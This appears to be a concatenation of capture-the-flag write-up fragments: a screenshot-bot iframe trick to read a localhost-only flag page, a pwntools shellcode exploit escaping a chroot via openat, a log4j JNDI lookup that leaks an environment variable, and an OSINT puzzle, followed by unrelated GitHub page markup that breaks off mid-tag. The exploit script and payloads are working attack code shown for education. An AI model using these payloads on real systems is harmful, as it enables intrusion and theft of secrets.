# access url try: driver.get(url) data = driver.get_screenshot_as_png() except common.exceptions.WebDriverException as e: return message(msg=str(e))
# save result img = Image.open(io.BytesIO(data)) img = img.resize((64,64), resample=Image.BILINEAR) img = img.resize((1920,1080), Image.NEAREST) img.save(path)
return message(msg=path) else: return message(msg="url not found :(")``` There is a special endpoint at `/flag` that displays the flag only if we come from `127.0.0.1`, so only the bot can view the flag : ```[email protected]('/flag')def flag(): print(request.remote_addr) if request.remote_addr == '127.0.0.1': return message(FLAG) return message("allow only from local")``` The idea is to redirect the bot to a page we control that contains an iframe which refers to the `/flag` endpoint, and zooms on parts of the flag to have large enough characters to bypass the blur. I used a combo of `div` with an `iframe` embedded in it to get only a part of the flag, and `transform`, `left`, `top` CSS properties to zoom on these parts. Here is the jinja template that does that : ```html
<html> <head> <style>#outerdiv { width: 1800px; height: 1000px; overflow: hidden; position: relative;}
#inneriframe { position: absolute; width: 100px; height: 100px; zoom: 20; -moz-transform: scale(20); -moz-transform-origin: 0 0; -webkit-transform: scale(20); -webkit-transform-origin: 0 0; border: none; left: -{{idx}}px; top: -320px;} </style> </head> <body> <div id="outerdiv"> <iframe src="http://127.0.0.1:8000/flag#msg" id="inneriframe" scrolling=yes></iframe> </div> </body></html>``` Each picture looks like this :  The python script that automates the process (increment the `left` in the template and save the screenshot) : ```pyfrom jinja2 import Templatefrom bs4 import BeautifulSoup
import requestsimport os
HOST = "http://3.113.172.41:26478/"# HOST = "http://0.0.0.0:8000/"
html = Template(open("./index.html.jinja2").read())
for idx in range(13): with open("./index.html", "w") as f: f.write(html.render(idx=450+90*idx))
r = requests.get(HOST + "/submit?url=http%3A%2F%2FMON-IP%3AMON-PORT%2F") soup = BeautifulSoup(r.text, "html.parser")
img = requests.get(HOST + soup.find(id="msg").a["href"]) with open("img/{:02d}.png".format(idx), "wb") as f: f.write(img.content)
print(idx)
os.system("bash -c 'convert img/{00..06}.png +append img/flag-0.png'")os.system("bash -c 'convert img/{07..12}.png +append img/flag-1.png'")``` The last two lines assemble all the images in 2 images that contains the flag :   FLAG : `hitcon{1-1-4-1-6-1-e-9-f-9-4-c-7-3-e-4-9-7-a-7-5-d-4-6-6-c-6-3-3-7-f-4}` |
**Guardians of the Galaxy**
was pwn challenge from idekCTF 2021
A sort of chroot escape shellcode, with a seccomp..
The goal was to find the only remaining filedescriptor opened outside the chroot,
to access file ../flag.txt relatively to this filedescriptor with openat function..
for doing this we just start from highest possible fd number 1003 in this case..
and we decrease it until we can open ../flag.txt relatively to this fd..
when we have found the good one ..it just works...
simple as 1...2...3...
the exploit:
```python3#!/usr/bin/env python# -*- coding: utf-8 -*-from pwn import *
context.update(arch="amd64", os="linux")context.log_level = 'info'
exe = ELF('./rocket')
host, port = "gotg.chal.idek.team", "1337"
if args.REMOTE: p = remote(host,port)else: p = remote('127.0.0.1', 1337)
p.recvuntil('journey:',drop=True)
leak = int(p.recvuntil('\n',drop=True),16)print('stack leak = '+hex(leak))
shellc = asm(''' mov ebp,1003loopy: mov edi,ebp push 257 pop rax lea rsi,fname[rip] xor edx,edx push rdx pop r10 syscall cmp rax,3 jge next dec ebp jnz loopynext: push rax pop rsi push 40 pop rax push 1 pop rdi xor edx,edx mov r10,64 syscall
push 60 pop rax syscallfname: .string "../flag.txt"''')
print(hexdump(shellc))
payload = shellc.ljust(0x820,b'\x90')+p64(leak+0x820)+p64(leak)
p.sendline(payload)
p.interactive()```
*nobodyisnobody still pwning things* |
We should use log4j CVE to exploit jndi and get flag from environment variable with following command:
```bash${jndi:ldap://127.0.0.1/${env:FLAG}}```
link to [complete writeup](https://github.com/Execut3/CTF-WriteUps/tree/master/2021/hxp/misc/Log%204%20sanity%20check/) |
Find using QRCode in the page at http://sweet.ua.pt/jpbarraca/course/aev-2122/main/.
This QRCode contains the following string `2zxl4DOhFTegVjpwL3a1IvjrgSTgXxJI57`. Convert this string from Base62 and obtain the flag.
## Flag
CTFUA{os1nt_1n_a3v_class} |
<html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com">
<link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/light-fe3f886b577a.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/dark-a1dbeda2886c.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_dimmed-1ad5cf51dfeb.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-11d3505dc06a.css" /><link data-color-theme="dark_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-8b800495504f.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_colorblind-daa38c88b795.css" /><link data-color-theme="light_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_high_contrast-1b9ea565820a.css" /><link data-color-theme="light_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_tritanopia-e4be9332dd6c.css" /><link data-color-theme="dark_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_tritanopia-0dcf95848dd5.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/primer-c581c4e461bb.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/global-0e278d45156f.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/github-dcaf0f44dbb1.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/code-26709f54a08d.css" />
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/wp-runtime-774bfe5ae983.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-327bbf-0aaeb22dd2a5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_soft-nav_soft-nav_ts-21fc7a4a0e8f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/environment-e059fd03252f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-2646a2c533e3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_details-dialog-elemen-63debe-c04540d458d4.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_js-b9368a9cb79e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_fzy_js_index_js-node_modules_github_markdown-toolbar-element_dist_index_js-e3de700a4c9d.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_js-node_modules_github_catalyst_-6afc16-e779583c369f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_text-ex-3415a8-7ecc10fb88d0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-79182d-befd2b2f5880.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_view-components_app_components_primer_primer_js-node_modules_gith-6a1af4-df3bc95b06d3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/github-elements-fc0e0b89822a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-1641411db24a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-9d9fe1859ce5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_manuelpuyol_turbo_dist_turbo_es2017-esm_js-4140d67f0cc2.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_alive-client_dist-bf5aa2-424aa982deef.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_hotkey_dist_-9fc4f4-d434ddaf3207.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-35b3ae68c408.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_github_session-resume_dist-def857-2a32d97c93c5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_paste-markdown_dist_index_esm_js-node_modules_github_quote-select-15ddcc-1512e06cfee0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_updatable-content_ts-430cacb5f7df.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_keyboard-shortcuts-helper_ts-app_assets_modules_github_be-f5afdb-8dd5f026c5b9.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-0af96d15a250.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_include-fragment_ts-app_assets_modules_github_behaviors_r-4077b4-75370d1c1705.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-7883159efa9e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/behaviors-742151da9690.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-06ff531-32d7d1e94817.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/notifications-global-f5b58d24780b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_morphdom_dist_morphdom-esm_js-node_modules_github_template-parts_lib_index_js-58417dae193c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_memoize_dist_esm_index_js-8496b7c4b809.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-70450e-0370b887db62.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_ref-selector_ts-7bdefeb88a1a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/codespaces-d1ede1f1114e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_mini-throt-a33094-b03defd3289b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_mini-th-85225b-226fc85f9b72.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/repositories-8093725f8825.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/topic-suggestions-7a1f0da7430a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/code-menu-89d93a449480.js"></script>
<title>CTF-writeups/MetaCTF-2021/Simple-Format at main · ArjunaAcchaDipa/CTF-writeups · GitHub</title>
<meta name="route-pattern" content="/:user_id/:repository/tree/*name(/*path)">
<meta name="current-catalog-service-hash" content="343cff545437bc2b0304c97517abf17bb80d9887520078e9757df416551ef5d6">
<meta name="request-id" content="8913:7430:4F595E4:51791A0:64121C61" data-pjax-transient="true"/><meta name="html-safe-nonce" content="40da5c0f07627d24c3f4dd7cd42b40cd18ea678713082460a57b3fda28b93f94" data-pjax-transient="true"/><meta name="visitor-payload" content="eyJyZWZlcnJlciI6IiIsInJlcXVlc3RfaWQiOiI4OTEzOjc0MzA6NEY1OTVFNDo1MTc5MUEwOjY0MTIxQzYxIiwidmlzaXRvcl9pZCI6Ijc2MjkxNDE5Njk5NTI5NzE4NzMiLCJyZWdpb25fZWRnZSI6ImZyYSIsInJlZ2lvbl9yZW5kZXIiOiJmcmEifQ==" data-pjax-transient="true"/><meta name="visitor-hmac" content="5a15d1fd375a76854bed04a83d4537e12e2cb84af87a894bd7c520301abf923a" data-pjax-transient="true"/>
<meta name="hovercard-subject-tag" content="repository:369551288" data-turbo-transient>
<meta name="github-keyboard-shortcuts" content="repository,source-code,file-tree" data-turbo-transient="true" />
<meta name="selected-link" value="repo_source" data-turbo-transient>
<meta name="google-site-verification" content="c1kuD-K2HIVF635lypcsWPoD4kilo5-jA_wBFyT4uMY"> <meta name="google-site-verification" content="KT5gs8h0wvaagLKAVWq8bbeNwnZZK1r1XQysX3xurLU"> <meta name="google-site-verification" content="ZzhVyEFwb7w3e0-uOTltm8Jsck2F5StVihD0exw2fsA"> <meta name="google-site-verification" content="GXs5KoUUkNCoaAZn7wPN-t01Pywp9M3sEjnt_3_ZWPc"> <meta name="google-site-verification" content="Apib7-x98H0j5cPqHWwSMm6dNU4GmODRoqxLiDzdx9I">
<meta name="octolytics-url" content="https://collector.github.com/github/collect" />
<meta name="analytics-location" content="/<user-name>/<repo-name>/files/disambiguate" data-turbo-transient="true" />
<meta name="user-login" content="">
<meta name="viewport" content="width=device-width"> <meta name="description" content="This repository contains write ups for CTFs that I attended. It might not be the most effective way, but it works :D - CTF-writeups/MetaCTF-2021/Simple-Format at main · ArjunaAcchaDipa/CTF-writeups"> <link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub"> <link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta name="apple-itunes-app" content="app-id=1477376905" /> <meta name="twitter:image:src" content="https://opengraph.githubassets.com/2c84cfc7b8c7d14bafcf168397564983d24092832ba2a7f11b380158f3413d3b/ArjunaAcchaDipa/CTF-writeups" /><meta name="twitter:site" content="@github" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="CTF-writeups/MetaCTF-2021/Simple-Format at main · ArjunaAcchaDipa/CTF-writeups" /><meta name="twitter:description" content="This repository contains write ups for CTFs that I attended. It might not be the most effective way, but it works :D - CTF-writeups/MetaCTF-2021/Simple-Format at main · ArjunaAcchaDipa/CTF-writeups" /> <meta property="og:image" content="https://opengraph.githubassets.com/2c84cfc7b8c7d14bafcf168397564983d24092832ba2a7f11b380158f3413d3b/ArjunaAcchaDipa/CTF-writeups" /><meta property="og:image:alt" content="This repository contains write ups for CTFs that I attended. It might not be the most effective way, but it works :D - CTF-writeups/MetaCTF-2021/Simple-Format at main · ArjunaAcchaDipa/CTF-writeups" /><meta property="og:image:width" content="1200" /><meta property="og:image:height" content="600" /><meta property="og:site_name" content="GitHub" /><meta property="og:type" content="object" /><meta property="og:title" content="CTF-writeups/MetaCTF-2021/Simple-Format at main · ArjunaAcchaDipa/CTF-writeups" /><meta property="og:url" content="https://github.com/ArjunaAcchaDipa/CTF-writeups" /><meta property="og:description" content="This repository contains write ups for CTFs that I attended. It might not be the most effective way, but it works :D - CTF-writeups/MetaCTF-2021/Simple-Format at main · ArjunaAcchaDipa/CTF-writeups" /> <link rel="assets" href="https://github.githubassets.com/">
<meta name="hostname" content="github.com">
<meta name="expected-hostname" content="github.com">
<meta name="enabled-features" content="TURBO_EXPERIMENT_RISKY,IMAGE_METRIC_TRACKING,GEOJSON_AZURE_MAPS">
<meta http-equiv="x-pjax-version" content="ef97471de14f8d2285f0269e8f0f7dc70845f693d3f6ccd2dd2daae5cd1bbebe" data-turbo-track="reload"> <meta http-equiv="x-pjax-csp-version" content="2a84822a832da97f1ea76cf989a357ec70c85713a2fd8f14c8421b76bbffe38c" data-turbo-track="reload"> <meta http-equiv="x-pjax-css-version" content="adfc12179419e463f9f320d07920b1684c9b7e060d4d9cd3a6cd5d0de37ce710" data-turbo-track="reload"> <meta http-equiv="x-pjax-js-version" content="711646ae23abb27cf728346f30f81c042d4428233a0795acf0e21ed664fe9d94" data-turbo-track="reload">
<meta name="turbo-cache-control" content="no-preview" data-turbo-transient="">
<meta data-hydrostats="publish">
<meta name="go-import" content="github.com/ArjunaAcchaDipa/CTF-writeups git https://github.com/ArjunaAcchaDipa/CTF-writeups.git">
<meta name="octolytics-dimension-user_id" content="62648000" /><meta name="octolytics-dimension-user_login" content="ArjunaAcchaDipa" /><meta name="octolytics-dimension-repository_id" content="369551288" /><meta name="octolytics-dimension-repository_nwo" content="ArjunaAcchaDipa/CTF-writeups" /><meta name="octolytics-dimension-repository_public" content="true" /><meta name="octolytics-dimension-repository_is_fork" content="false" /><meta name="octolytics-dimension-repository_network_root_id" content="369551288" /><meta name="octolytics-dimension-repository_network_root_nwo" content="ArjunaAcchaDipa/CTF-writeups" />
<link rel="canonical" href="https://github.com/ArjunaAcchaDipa/CTF-writeups/tree/main/MetaCTF-2021/Simple-Format" data-turbo-transient> <meta name="turbo-body-classes" content="logged-out env-production page-responsive">
<meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats">
<meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors">
<meta name="browser-optimizely-client-errors-url" content="https://api.github.com/_private/browser/optimizely_client/errors">
<link rel="mask-icon" href="https://github.githubassets.com/pinned-octocat.svg" color="#000000"> <link rel="alternate icon" class="js-site-favicon" type="image/png" href="https://github.githubassets.com/favicons/favicon.png"> <link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg">
<meta name="theme-color" content="#1e2327"><meta name="color-scheme" content="light dark" />
<link rel="manifest" href="/manifest.json" crossOrigin="use-credentials">
</head>
<body class="logged-out env-production page-responsive" style="word-wrap: break-word;"> <div data-turbo-body class="logged-out env-production page-responsive" style="word-wrap: break-word;">
<div class="position-relative js-header-wrapper "> Skip to content <span> <span></span></span>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-04fa93bb158a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/sessions-9920eaa99f50.js"></script><header class="Header-old header-logged-out js-details-container Details position-relative f4 py-3" role="banner"> <button type="button" class="Header-backdrop d-lg-none border-0 position-fixed top-0 left-0 width-full height-full js-details-target" aria-label="Toggle navigation"> <span>Toggle navigation</span> </button>
<div class="container-xl d-flex flex-column flex-lg-row flex-items-center p-responsive height-full position-relative z-1"> <div class="d-flex flex-justify-between flex-items-center width-full width-lg-auto"> <svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg>
<div class="flex-1"> Sign up </div>
<div class="flex-1 flex-order-2 text-right"> <button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target Button--link Button--medium Button d-lg-none color-fg-inherit p-1"> <span> <span><div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div></span> </span></button> </div> </div>
<div class="HeaderMenu--logged-out p-responsive height-fit position-lg-relative d-lg-flex flex-column flex-auto pt-7 pb-4 top-0"> <div class="header-menu-wrapper d-flex flex-column flex-self-end flex-lg-row flex-justify-between flex-auto p-3 p-lg-0 rounded rounded-lg-0 mt-3 mt-lg-0"> <nav class="mt-0 px-3 px-lg-0 mb-3 mb-lg-0" aria-label="Global"> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Product <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 d-lg-flex dropdown-menu-wide">
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-workflow color-fg-subtle mr-3"> <path d="M1 3a2 2 0 0 1 2-2h6.5a2 2 0 0 1 2 2v6.5a2 2 0 0 1-2 2H7v4.063C7 16.355 7.644 17 8.438 17H12.5v-2.5a2 2 0 0 1 2-2H21a2 2 0 0 1 2 2V21a2 2 0 0 1-2 2h-6.5a2 2 0 0 1-2-2v-2.5H8.437A2.939 2.939 0 0 1 5.5 15.562V11.5H3a2 2 0 0 1-2-2Zm2-.5a.5.5 0 0 0-.5.5v6.5a.5.5 0 0 0 .5.5h6.5a.5.5 0 0 0 .5-.5V3a.5.5 0 0 0-.5-.5ZM14.5 14a.5.5 0 0 0-.5.5V21a.5.5 0 0 0 .5.5H21a.5.5 0 0 0 .5-.5v-6.5a.5.5 0 0 0-.5-.5Z"></path></svg> <div> <div class="color-fg-default h4">Actions</div> Automate any workflow </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-package color-fg-subtle mr-3"> <path d="M12.876.64V.639l8.25 4.763c.541.313.875.89.875 1.515v9.525a1.75 1.75 0 0 1-.875 1.516l-8.25 4.762a1.748 1.748 0 0 1-1.75 0l-8.25-4.763a1.75 1.75 0 0 1-.875-1.515V6.917c0-.625.334-1.202.875-1.515L11.126.64a1.748 1.748 0 0 1 1.75 0Zm-1 1.298L4.251 6.34l7.75 4.474 7.75-4.474-7.625-4.402a.248.248 0 0 0-.25 0Zm.875 19.123 7.625-4.402a.25.25 0 0 0 .125-.216V7.639l-7.75 4.474ZM3.501 7.64v8.803c0 .09.048.172.125.216l7.625 4.402v-8.947Z"></path></svg> <div> <div class="color-fg-default h4">Packages</div> Host and manage packages </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-shield-check color-fg-subtle mr-3"> <path d="M16.53 9.78a.75.75 0 0 0-1.06-1.06L11 13.19l-1.97-1.97a.75.75 0 0 0-1.06 1.06l2.5 2.5a.75.75 0 0 0 1.06 0l5-5Z"></path><path d="m12.54.637 8.25 2.675A1.75 1.75 0 0 1 22 4.976V10c0 6.19-3.771 10.704-9.401 12.83a1.704 1.704 0 0 1-1.198 0C5.77 20.705 2 16.19 2 10V4.976c0-.758.489-1.43 1.21-1.664L11.46.637a1.748 1.748 0 0 1 1.08 0Zm-.617 1.426-8.25 2.676a.249.249 0 0 0-.173.237V10c0 5.46 3.28 9.483 8.43 11.426a.199.199 0 0 0 .14 0C17.22 19.483 20.5 15.461 20.5 10V4.976a.25.25 0 0 0-.173-.237l-8.25-2.676a.253.253 0 0 0-.154 0Z"></path></svg> <div> <div class="color-fg-default h4">Security</div> Find and fix vulnerabilities </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-codespaces color-fg-subtle mr-3"> <path d="M3.5 3.75C3.5 2.784 4.284 2 5.25 2h13.5c.966 0 1.75.784 1.75 1.75v7.5A1.75 1.75 0 0 1 18.75 13H5.25a1.75 1.75 0 0 1-1.75-1.75Zm-2 12c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v4a1.75 1.75 0 0 1-1.75 1.75H3.25a1.75 1.75 0 0 1-1.75-1.75ZM5.25 3.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h13.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Zm-2 12a.25.25 0 0 0-.25.25v4c0 .138.112.25.25.25h17.5a.25.25 0 0 0 .25-.25v-4a.25.25 0 0 0-.25-.25Z"></path><path d="M10 17.75a.75.75 0 0 1 .75-.75h6.5a.75.75 0 0 1 0 1.5h-6.5a.75.75 0 0 1-.75-.75Zm-4 0a.75.75 0 0 1 .75-.75h.5a.75.75 0 0 1 0 1.5h-.5a.75.75 0 0 1-.75-.75Z"></path></svg> <div> <div class="color-fg-default h4">Codespaces</div> Instant dev environments </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-copilot color-fg-subtle mr-3"> <path d="M9.75 14a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Zm4.5 0a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Z"></path><path d="M12 2c2.214 0 4.248.657 5.747 1.756.136.099.268.204.397.312.584.235 1.077.546 1.474.952.85.869 1.132 2.037 1.132 3.368 0 .368-.014.733-.052 1.086l.633 1.478.043.022A4.75 4.75 0 0 1 24 15.222v1.028c0 .529-.309.987-.565 1.293-.28.336-.636.653-.966.918a13.84 13.84 0 0 1-1.299.911l-.024.015-.006.004-.039.025c-.223.135-.45.264-.68.386-.46.245-1.122.571-1.941.895C16.845 21.344 14.561 22 12 22c-2.561 0-4.845-.656-6.479-1.303a19.046 19.046 0 0 1-1.942-.894 14.081 14.081 0 0 1-.535-.3l-.144-.087-.04-.025-.006-.004-.024-.015a13.16 13.16 0 0 1-1.299-.911 6.913 6.913 0 0 1-.967-.918C.31 17.237 0 16.779 0 16.25v-1.028a4.75 4.75 0 0 1 2.626-4.248l.043-.022.633-1.478a10.195 10.195 0 0 1-.052-1.086c0-1.331.282-2.498 1.132-3.368.397-.406.89-.717 1.474-.952.129-.108.261-.213.397-.312C7.752 2.657 9.786 2 12 2Zm-8 9.654v6.669a17.59 17.59 0 0 0 2.073.98C7.595 19.906 9.686 20.5 12 20.5c2.314 0 4.405-.594 5.927-1.197a17.59 17.59 0 0 0 2.073-.98v-6.669l-.038-.09c-.046.061-.095.12-.145.177-.793.9-2.057 1.259-3.782 1.259-1.59 0-2.738-.544-3.508-1.492a4.323 4.323 0 0 1-.355-.508h-.344a4.323 4.323 0 0 1-.355.508C10.704 12.456 9.555 13 7.965 13c-1.725 0-2.989-.359-3.782-1.259a3.026 3.026 0 0 1-.145-.177Zm6.309-1.092c.445-.547.708-1.334.851-2.301.057-.357.087-.718.09-1.079v-.031c-.001-.762-.166-1.26-.43-1.568l-.008-.01c-.341-.391-1.046-.689-2.533-.529-1.505.163-2.347.537-2.824 1.024-.462.473-.705 1.18-.705 2.32 0 .605.044 1.087.135 1.472.092.384.231.672.423.89.365.413 1.084.75 2.657.75.91 0 1.527-.223 1.964-.564.14-.11.268-.235.38-.374Zm2.504-2.497c.136 1.057.403 1.913.878 2.497.442.545 1.134.938 2.344.938 1.573 0 2.292-.337 2.657-.751.384-.435.558-1.151.558-2.361 0-1.14-.243-1.847-.705-2.319-.477-.488-1.318-.862-2.824-1.025-1.487-.161-2.192.139-2.533.529-.268.308-.437.808-.438 1.578v.02c.002.299.023.598.063.894Z"></path></svg> <div> <div class="color-fg-default 